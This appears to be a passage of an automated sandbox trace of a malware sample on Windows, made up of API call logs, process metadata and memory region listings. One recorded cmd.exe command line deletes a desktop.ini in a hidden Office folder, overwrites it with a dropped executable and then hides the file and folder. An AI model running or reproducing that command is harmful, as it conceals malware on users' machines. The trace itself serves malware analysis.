(hFile=0x4c) returned 0x1 [0162.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.792] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f4a0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.792] GetFileType (hFile=0x4c) returned 0x1 [0162.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.792] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f4f0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.792] GetFileType (hFile=0x4c) returned 0x1 [0162.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.793] WriteFile (in: hFile=0x4c, lpBuffer=0x14f540*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f540*, lpNumberOfBytesWritten=0x14e544*=0x20, lpOverlapped=0x0) returned 1 [0162.793] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.793] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e530 | out: lpNewFilePointer=0x0) returned 1 [0162.793] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.793] ReadFile (in: hFile=0x54, lpBuffer=0x14f360, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e550, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesRead=0x14e550*=0x200, lpOverlapped=0x0) returned 1 [0162.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.793] GetFileType (hFile=0x4c) returned 0x1 [0162.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.793] GetFileType (hFile=0x4c) returned 0x1 [0162.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.793] WriteFile (in: hFile=0x4c, lpBuffer=0x14f360*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.793] GetFileType (hFile=0x4c) returned 0x1 [0162.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.793] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f3b0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.793] GetFileType (hFile=0x4c) returned 0x1 [0162.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.794] WriteFile (in: hFile=0x4c, lpBuffer=0x14f400*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f400*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.794] GetFileType (hFile=0x4c) returned 0x1 [0162.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.794] WriteFile (in: hFile=0x4c, lpBuffer=0x14f450*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f450*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.794] GetFileType (hFile=0x4c) returned 0x1 [0162.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.794] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f4a0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.794] GetFileType (hFile=0x4c) returned 0x1 [0162.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.794] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f4f0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.794] GetFileType (hFile=0x4c) returned 0x1 [0162.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.794] WriteFile (in: hFile=0x4c, lpBuffer=0x14f540*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f540*, lpNumberOfBytesWritten=0x14e544*=0x20, lpOverlapped=0x0) returned 1 [0162.794] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.794] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e530 | out: lpNewFilePointer=0x0) returned 1 [0162.794] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.794] ReadFile (in: hFile=0x54, lpBuffer=0x14f360, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e550, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesRead=0x14e550*=0x200, lpOverlapped=0x0) returned 1 [0162.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.795] GetFileType (hFile=0x4c) returned 0x1 [0162.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.795] GetFileType (hFile=0x4c) returned 0x1 [0162.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.795] WriteFile (in: hFile=0x4c, lpBuffer=0x14f360*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.795] GetFileType (hFile=0x4c) returned 0x1 [0162.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.795] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f3b0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.795] GetFileType (hFile=0x4c) returned 0x1 [0162.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.795] WriteFile (in: hFile=0x4c, lpBuffer=0x14f400*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f400*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.795] GetFileType (hFile=0x4c) returned 0x1 [0162.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.795] WriteFile (in: hFile=0x4c, lpBuffer=0x14f450*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f450*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.795] GetFileType (hFile=0x4c) returned 0x1 [0162.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.796] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f4a0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.796] GetFileType (hFile=0x4c) returned 0x1 [0162.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.796] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f4f0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.796] GetFileType (hFile=0x4c) returned 0x1 [0162.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.796] WriteFile (in: hFile=0x4c, lpBuffer=0x14f540*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f540*, lpNumberOfBytesWritten=0x14e544*=0x20, lpOverlapped=0x0) returned 1 [0162.796] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.796] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e530 | out: lpNewFilePointer=0x0) returned 1 [0162.796] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.796] ReadFile (in: hFile=0x54, lpBuffer=0x14f360, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e550, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesRead=0x14e550*=0x200, lpOverlapped=0x0) returned 1 [0162.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.796] GetFileType (hFile=0x4c) returned 0x1 [0162.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.796] GetFileType (hFile=0x4c) returned 0x1 [0162.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.796] WriteFile (in: hFile=0x4c, lpBuffer=0x14f360*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.796] GetFileType (hFile=0x4c) returned 0x1 [0162.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.797] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f3b0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.797] GetFileType (hFile=0x4c) returned 0x1 [0162.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.797] WriteFile (in: hFile=0x4c, lpBuffer=0x14f400*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f400*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.797] GetFileType (hFile=0x4c) returned 0x1 [0162.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.797] WriteFile (in: hFile=0x4c, lpBuffer=0x14f450*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f450*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.797] GetFileType (hFile=0x4c) returned 0x1 [0162.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.797] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f4a0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.797] GetFileType (hFile=0x4c) returned 0x1 [0162.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.797] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f4f0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.797] GetFileType (hFile=0x4c) returned 0x1 [0162.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.798] WriteFile (in: hFile=0x4c, lpBuffer=0x14f540*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f540*, lpNumberOfBytesWritten=0x14e544*=0x20, lpOverlapped=0x0) returned 1 [0162.798] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.798] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e530 | out: lpNewFilePointer=0x0) returned 1 [0162.798] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.798] ReadFile (in: hFile=0x54, lpBuffer=0x14f360, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e550, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesRead=0x14e550*=0x32, lpOverlapped=0x0) returned 1 [0162.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.798] GetFileType (hFile=0x4c) returned 0x1 [0162.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.798] GetFileType (hFile=0x4c) returned 0x1 [0162.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.798] WriteFile (in: hFile=0x4c, lpBuffer=0x14f360*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesWritten=0x14e544*=0x32, lpOverlapped=0x0) returned 1 [0162.798] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.798] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e530 | out: lpNewFilePointer=0x0) returned 1 [0162.798] _close (_FileHandle=4) returned 0 [0162.798] FindNextFileW (in: hFindFile=0x2c0eb0, lpFindFileData=0x14f5c4 | out: lpFindFileData=0x14f5c4) returned 0 [0162.799] GetLastError () returned 0x12 [0162.799] FindClose (in: hFindFile=0x2c0eb0 | out: hFindFile=0x2c0eb0) returned 1 [0162.799] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0162.800] _close (_FileHandle=3) returned 0 [0162.800] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.800] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0162.800] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.800] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0162.800] _get_osfhandle (_FileHandle=0) returned 0x3 [0162.800] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0162.801] SetConsoleInputExeNameW () returned 0x1 [0162.801] GetConsoleOutputCP () returned 0x1b5 [0162.801] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0162.801] SetThreadUILanguage (LangId=0x0) returned 0x409 [0162.801] exit (_Code=0) Process: id = "280" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166c0" os_pid = "0xef8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22360 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22361 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22362 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22363 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 22364 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 22365 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22366 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22367 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22368 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 22369 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 22445 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 22446 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 22447 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 22448 start_va = 0x2d0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 22449 start_va = 0x370000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 22450 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 22451 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 22452 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 22453 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 22454 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 22455 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 22456 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 22457 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 22458 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 22459 start_va = 0x470000 end_va = 0x537fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 22460 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 22461 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 22462 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 22463 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 22464 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 22465 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 22466 start_va = 0x540000 end_va = 0x640fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 22467 start_va = 0x650000 end_va = 0x124ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 22468 start_va = 0x1250000 end_va = 0x13b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001250000" filename = "" Region: id = 22510 start_va = 0x13c0000 end_va = 0x168efff entry_point = 0x13c0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 344 os_tid = 0xfb0 [0162.472] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fac4 | out: lpSystemTimeAsFileTime=0x22fac4*(dwLowDateTime=0x9a37f460, dwHighDateTime=0x1d440a9)) [0162.472] GetCurrentProcessId () returned 0xef8 [0162.472] GetCurrentThreadId () returned 0xfb0 [0162.472] GetTickCount () returned 0x313ed [0162.472] QueryPerformanceCounter (in: lpPerformanceCount=0x22fabc | out: lpPerformanceCount=0x22fabc*=21926166513) returned 1 [0162.473] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0162.473] __set_app_type (_Type=0x1) [0162.473] __p__fmode () returned 0x76b331f4 [0162.473] __p__commode () returned 0x76b331fc [0162.474] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0162.474] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0162.474] GetCurrentThreadId () returned 0xfb0 [0162.474] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xfb0) returned 0x38 [0162.474] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0162.474] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0162.474] SetThreadUILanguage (LangId=0x0) returned 0x409 [0162.474] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0162.474] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22fa54 | out: phkResult=0x22fa54*=0x0) returned 0x2 [0162.474] VirtualQuery (in: lpAddress=0x22fa8b, lpBuffer=0x22fa24, dwLength=0x1c | out: lpBuffer=0x22fa24*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.474] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22fa24, dwLength=0x1c | out: lpBuffer=0x22fa24*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0162.474] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22fa24, dwLength=0x1c | out: lpBuffer=0x22fa24*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0162.474] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22fa24, dwLength=0x1c | out: lpBuffer=0x22fa24*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.475] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22fa24, dwLength=0x1c | out: lpBuffer=0x22fa24*(BaseAddress=0x230000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xa0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0162.475] GetConsoleOutputCP () returned 0x1b5 [0162.475] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0162.475] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0162.475] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.475] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0162.475] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.475] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0162.475] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.475] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0162.475] _get_osfhandle (_FileHandle=0) returned 0x3 [0162.475] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0162.476] _get_osfhandle (_FileHandle=0) returned 0x3 [0162.476] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0162.476] GetEnvironmentStringsW () returned 0x380560* [0162.476] FreeEnvironmentStringsW (penv=0x380560) returned 1 [0162.476] GetEnvironmentStringsW () returned 0x380560* [0162.476] FreeEnvironmentStringsW (penv=0x380560) returned 1 [0162.476] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22e9c4 | out: phkResult=0x22e9c4*=0x40) returned 0x0 [0162.476] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22e9cc, lpData=0x22e9d0, lpcbData=0x22e9c8*=0x1000 | out: lpType=0x22e9cc*=0x0, lpData=0x22e9d0*=0x10, lpcbData=0x22e9c8*=0x1000) returned 0x2 [0162.476] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22e9cc, lpData=0x22e9d0, lpcbData=0x22e9c8*=0x1000 | out: lpType=0x22e9cc*=0x4, lpData=0x22e9d0*=0x1, lpcbData=0x22e9c8*=0x4) returned 0x0 [0162.476] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22e9cc, lpData=0x22e9d0, lpcbData=0x22e9c8*=0x1000 | out: lpType=0x22e9cc*=0x0, lpData=0x22e9d0*=0x1, 